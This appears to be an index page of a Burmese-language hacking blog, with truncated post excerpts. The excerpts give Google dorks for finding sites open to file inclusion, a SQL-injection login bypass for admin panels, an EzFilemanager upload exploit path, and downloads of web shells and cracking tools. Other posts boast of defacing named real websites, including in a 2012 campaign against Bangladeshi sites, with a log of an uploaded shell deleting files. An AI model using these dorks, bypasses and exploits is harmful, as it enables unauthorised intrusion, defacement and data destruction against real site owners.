LFI with php://filter

ဒီပိုစ့္ေလးဟာ LFI ေပၚမွာဆင့္ကဲေျပာင္းလဲထားတာျဖစ္ျပီးေတာ့ BASE 64 php filter ကိုအသံုးျပဳမွာျဖစ္ပါတယ္....။ဆာဗာမွာရိွတဲ့ connect.php / config.php / index.php လိုမ်ိဳး php ဖိုင္ ေတြကိုျမင္ေတြ႕ႏိုင္မွာျဖစ္ပါတယ္...။ ပထမဆံုးေအာက္ပါ LFI Dorks ေတြကိုသံုးျပီး LFI vulnerable sites ေတြကိုရွာပါ...။ inurl:index.php?page=index.phpinurl:index.php?page=sitemap.phpinurl:index.php?page=awards.phpinurl:index.php?page=book.phpinurl:index.php?page=store.phpinurl:index.php?page=items.phpinurl:index.php?page=feedback.phpinurl:index.php?page=welcome.phpinurl:index.php?page=advertise.phpinurl:index.php?page=festival.phpinurl:index.php?page=band.phpinurl:index.php?page=musicians.phpinurl:index.php?page=artist.phpinurl:index.php?page=archive.phpinurl:index.php?page=facilities.phpinurl:index.php?page=activies.phpinurl:index.php?page=bio.phpinurl:index.php?page=biography.phpinurl:index.php?page=menu.phpinurl:index.php?page=profile.phpinurl:index.php?page=terms.phpinurl:index.php?page=tos.phpinurl:index.php?page=screenshots.phpinurl:index.php?page=plans.phpinurl:index.php?page=templates.phpinurl:index.php?page=browse.phpinurl:index.php?page=shows.phpinurl:index.php?page=dining.phpinurl:index.php?page=media.phpinurl:index.php?page=offers.phpinurl:index.php?page=photogallery.phpinurl:index.php?page=schools.phpinurl:index.php?page=rates.phpinurl:index.php?page=buy.phpinurl:index.php?page=pricing.phpinurl:index.php?page=web.phpinurl:index.php?page=cms.phpinurl:index.php?page=sponsors.phpinurl:index.php?page=login.phpinurl:index.php?page=admin.phpinurl:index.php?page=register.phpinurl:index.php?page=signin.phpinurl:index.php?page=signup.phpinurl:index.php?page=artikel.phpinurl:index.php?page=kontakt.phpinurl:index.php?page=directions.phpinurl:index.php?page=farm.phpinurl:index.php?page=resume.phpinurl:index.php?page=products.phpinurl:index.php?page=music.phpinurl:index.php?page=agenda.phpinurl:index.php?page=faculty.phpinurl:index.php?page=overview.phpinurl:index.php?page=research.phpinurl:index.php?page=publications.phpinurl:index.php?page=outreach.phpinurl:index.php?page=education.phpinurl:index.php?page=regulatoins.php ေအာက္ေဖၚျပပါဆိုက္ေတြကို...

Read More ->>

WiFi Hack နည္း ျမန္မာလို စာအုပ္

Back Track 5 ေဆာ့ဝဲလ္ ကို အသံုးျပဳျပီး WiFi Password Hack နည္းေလးကို အေသးစိတ္ ရွင္းျပထားတဲ႔ ျမန္မာလို ေရးထားတဲ႔ စာအုပ္ေလးပါ... Facebook က သူငယ္ခ်င္းတစ္ေယာက္ဆီကေန အားလံုးအတြက္ ျပန္လည္ မွ်ေဝေပးလိုက္ပါတယ္...။ အားလံုးေပ်ာ္ရႊင္ၾကပါေစဗ်ားးး...:) Download Wifi Hacking Basic Ebook copy from:www.winkabarkyaw.co...

Read More ->>

Gmail Hacking is 100% work or not? And Gmail passwords are 100% safe or not?

Intro: ဒီပိုစ့္သည္ Tutorial လဲမဟုတ္ပါ ေဆာင္းပါသက္သက္လဲမဟုတ္ပါ...။ Gmail passwords are 100% safe or not? Gmail နဲ႕ ပတ္သက္ျပီးေတာ့ ကၽြန္ေတာ္ယံုတမး္ပံုျပင္ေတြေကာ...တကယ့္ အျဖစ္အပ်က္ေတြေကာအမ်ိဳးမ်ိဳး မွန္သမွ်ကၽြန္ေတာ္ ၾကားဘူးပါတယ္....။Gmail နဲ႕ ပတ္သက္ျပီေတာ့ ဘယ္လိုလံုျခံဳေအာင္ကာကြယ္ရမလဲ ဘယ္လိုမ်ား Attacking လုပ္ရမလဲေတြေကာ အမ်ိဳးမ်ိဳးပါပဲ........။ Gmail...

Read More ->>

Password is 123456 (ebook)

ပက္စ္၀ဘ္ေတြအေၾကာင္းပါ...ဘယ္လို crack ရမယ္ .ဘယ္လိုကာကြယ္ရမလဲ ဆိုတာေတြအျပင္..... တျခားအေၾကာင္းအရာေလးေတြ အနည္းငယ္ပါ၀င္ ပါတယ္.ေအာက္ကလင့္ကေနေဒါင္းလိုက္ပါ....။ review ကို ေသခ်ာေရးေပးမေနေတာ့ပါဘူး......။ Download မွတ္ခ်က္။   ။ password ကို rar ဖိုင္ထဲမွာတစ္ ခါတည္းထည့္ေပးထားတ...

Read More ->>

XSS Overview Part 2 : Types of Attacking Techniques

Types of Attacking Techniques 1.Cookies Stealing 2.XSS Phishing 3.XSS Defacement 4.XSS worm 5.Session Hijacking 1.Cookies Stealingပထမဆံုး Cookies Stealing လုပ္ဖို႕အဓိကလိုအပ္ေသာ Cookies Catcher အေၾကာင္း အနည္းငယ္ေျပာပါမယ္ ေနာက္ပို႕စ္မွာ Cookies Catcher အေၾကာင္း အေသးစိတ္ေရးေပးပါ့မယ္ Cookies Catcher ဆိုတာ Cookies Stealing လုပ္ရန္ စီစဥ္ထားေသာ...

Read More ->>

အားေပးေထာက္ခံေပးျခင္း

အထက္ပါပံုအတိုင္းျမန္မာအိုင္တီနန္းေတာ္ မွကၽြန္ေတာ့္သူငယ္ခ်င္း little.blackr00ter (http://www.d3l3t3r-idl0t.co.cc/ မွ) အားေစာ္ကားျပီး စြတ္ဆဲြ ေျပာဆိုခဲ့ျခင္းအား   ကၽြန္ေတာ့္သူငယ္ခ်င္း little.blackr00ter ဘက္မွ အခ်ိန္ျပည့္ အားေပးေထာက္ခံေနမည္ျဖစ္ပါေၾကာင္း ဦးစြာပထမ ေျပာဆိုလိုပါတယ္......။ ေအာက္ပါစာသားမ်ား သည္ကၽြန္ေတာ့္သူငယ္ခ်င္၏...http://www.d3l3t3r-idl0t.co.cc/2012/04/blog-post_10.html...

Read More ->>

Shell collections (download)

ကၽြန္ေတာ္သိသေလာက္ျပန္စုထားတာ ...ကၽြန္ေတာ္မအားလို႕ virus scan လုပ္မေပးႏိုင္ဘူး ကိုယ္ဘာသာ လုပ္ယူၾကေပေတာ့ ....ဒီထဲမွာကၽြန္ေတာ္သိသေလာက္ shell (၂၀) ထည့္ေပးထားတယ္.....။ ေအာက္ကလင့္ကေနေဒါင္းလိုက္ၾကပါ.......။ Download ေအာက္ပါေနရာကလဲရႏိုင္သည္....။ http://sh3ll.o...

Read More ->>

HOW TO HACK WEBSITES ADMIN PANEL

1. search google for adminlogin.asp 2.click on any link 3.in the username field type admin 4. in the password field type 'or''=' UR DONE........ :-) Enjory.../ post by aung L...

Read More ->>

How to use m1rr0r:::::,..

mirror ဆိုတာ ဘာပါလဲ...mirror ဆိုတာ defacer မ်ားအတြက္ အေကာင္းဆံုး မိမိဒီ website ကို deface အုပ္ခဲ႔ေၾကာင္းျပဖို႔ အေကာင္းဆံုးသက္ေသ ပါ...မိမိတို႔ရဲ႔ deface link ကို screenshot ေလးရိုက္ျပထားရံုနဲ႔ မလံုေလာက္ပါဘူး... ျမန္မာမွာ mirror သံုးတာ bro Dongoth နဲ႔ blackvenom တို႔ကိုပဲ ပထမဆံုးျမင္ဖူးပါတယ္......ျမန္မာျပည္ရဲ႔ mirror ဖခင္ၾကီးေတြေပါ႔ဗ်ာ......

Read More ->>

EzFilemanager Deface Upload vulnerability

Google Dork inurl:ezfilemanager/ezfilemanager.php Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and put ?sa=1&type=file after URLnow url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file ကြ်န္ေတာ္တို...

Read More ->>

XCode SQL Injection/LFI/XSS Vulnurable & Webshell Scanner

USAGE: Once downloaded, extract all the files and run XCodeXploitScanner.exe, insert your dork, Click Dork It and it will collect links from Dork you enter and displays the list. after displaying List, you will be able to conduct SQL injection vulnerability scanning / Local File Inclusion / Cross Site Scripting on the web that is in...

Read More ->>

SQL Dork Lists (Download)

Dork ေတြ စုတင္ေပးထားတာ...သံုးရင္လဲ မ်ားမ်ားသံုးရေအာင္လို႕ ေပါ့ေနာ္.....။မ်က္စိလည္းေနာက္ ေအာင္လို႕ေပါ့ေနာ္ .......။သူမ်ားမေျပာနဲ႕ ကိုယ္ ဘာသာကိုယ္ေတာင္ BE သံုးလံုးစာေလာက္ကိုမူးသြာတာ.......အဲဒီေလာက္ကိုမ်ားတာ...။ဘာေတြမွန္း ကို မသိေတာ့ေအာင္မ်ားတာ.......။ ကၽြန္ေတာ့္လိုမ်က္စိေနာက္တာခံႏိုင္ရင္ ေအာက္ကလင့္ကေနေဒါင္းသြားလိုက္ၾကပါ......။ Downl...

Read More ->>

XSS?? What is XSS??

XSS ဆိုတာ Cross-site Scripting လုိ႕ေခၚတဲ့ Web Application Vuln တစ္မ်ိဳးျဖစ္ျပီး အစကေတာ့ CSS လို႕ေခၚၾကပါတယ္ ေနာက္ပိုင္း Cascading Style Sheet နဲ ေရာေနတဲ့အတြက္ XSS လို႕ေျပာင္းလဲေခၚေ၀ၚၾကတာျဖစ္ပါတယ္ ။ Web Master ရဲ႕ Filter လုပ္မထားေသာ Input Vulnerability မွတစ္ဆင့္ Html ႏွင့္ Java Script မ်ား Inject လုပ္ကာ User မ်ား၏ Web Browser မ်ားကို...

Read More ->>

Happy New Year For All Myanmar

ဒီပိုစ့္ေလးက ဘာမွေတာ့ဟုတ္ပါဘူး......ကၽြန္ေတာ္တို႕ ျမန္မာႏွစ္ကူးအခါ မဂၤလာအခ်ိန္ေလးမွာ ျမန္မာ ျပည္သားအေပါင္း ေပွ်ာ္ရႊင္ျခင္းက်န္မားျခင္းမ်ားႏွင့္ျပည့္စံု ႏိုင္ပါေစေၾကာင္း ဆုေတာင္းေပးခ်င္လို႕ပါ.......။ ေနာက္ျပီး Hacking ကိုျမတ္ႏီုးသူခ်စ္တဲ့သူတိုင္း ႏွစ္ကူးအခ်ိန္အခါေလးအတြင္းမွာ....ယခင္းအခ်ိန္မ်ားထက္ အဆ 1000 အဆ 10000 ေပွ်ာ္ရႊင္းစရာမ်ားႏွင့္ၾကံဳ...

Read More ->>

Finish Operation Bangladesh

ေရပိုင္နက္အျငင္းပြားမႈနဲ႔ပတ္သက္ျပီး Myanmar Hackers Unite4m မွဆင္ႏြဲခဲ႔တဲ႔ Operation Bangladesh ကို အရႈံးအႏိူင္မရွိ အဆံုးသတ္ပါျပီ... ကၽြန္ေတာ္တို႔ အေနနဲ႔ Operation Bangladesh က္ို March27 ,2012 မွာ ဘဂၤလားေဒ႔ရွ္ဆိုဒ္ေတြကို စတင္တိုက္ခိုက္ျပီး စတင္ခဲ႔ပါတယ္...Bangladesh ဖက္ကလည္း ေအာက္ပါအတိုင္း သူတို႔ရဲ႔ facebook page မွာျပန္လည္ေၾကညာခဲ႔ပါတယ္.... Greetings...

Read More ->>

My New Defacing Page

ကၽြန္ေတာ္အသစ္ျပန္လုပ္ထားတာ..ကိုယ္ပိုင္ညဏ္ေတာ့ဟုတ္ဘူးရယ္ အဆင္ေျပသလို ဟိုစစ ဒီစစ ယူထားတာ....။ေအာက္မွာ Demo Link...ေပးထားတယ္.ၾကည့္ခ်င္ရင္၀င္ ၾကည့္ႏိုင္ပါသည္.....။ Demo Link: http://pastehtml.com/view/bupk3rgui.h...

Read More ->>

Start cyber war Myanmar & BD

ျမန္မာႏွင့္ဘဂၤလားေဒ့ေရပိုင္နက္အေရးကိုအကုန္သိရိွၾကမွာပါ..ျမန္မာဘက္က ေပးလိုက္ရပါတယ္.. က်ေနာ္တို႔ေျမအက်ဴး.ေက်ာ္ခံတာ ဘယ္ျမန္မာနိင္ငံသားမွမခံပါဘူး...ဒါေၾကာင့္ ျမန္မာ hacker မ်ားစုေပါင္းျပီး...ဘဂၤလားေဒ့ ဆိုဒ္မ်ားကို hack ျပီး တံု႔ ျပန္ခဲ့ပါတယ္...ဒီအေၾကာင္းေတြကို အစံုအလင္သိခ်င္ရင္ MHF http://mmhackforums.noonhost.com/operation-bangledesh-vf40.html...

Read More ->>

http://americanrvadventures.com/ H@ck by Shwe K0

Demo Link :http://americanrvadventures.c...

Read More ->>

Tw0 bangledesh sites hackeD

http://www.islamictv.com.bd/index.php?page=show_video&id=49 http://www.erangpurchitra.com http://erangpurchitra.com/ad/ Uploaded shell. Deleted index.php... Deleting dir /home/erangpur/public_html/admin/img... Deleted login-button.jpg... Deleted logout.png... Deleted 3.png... Deleted 1.png... Deleted Untitled-2_03.gif... Deleted 2.png... Deleted...

Read More ->>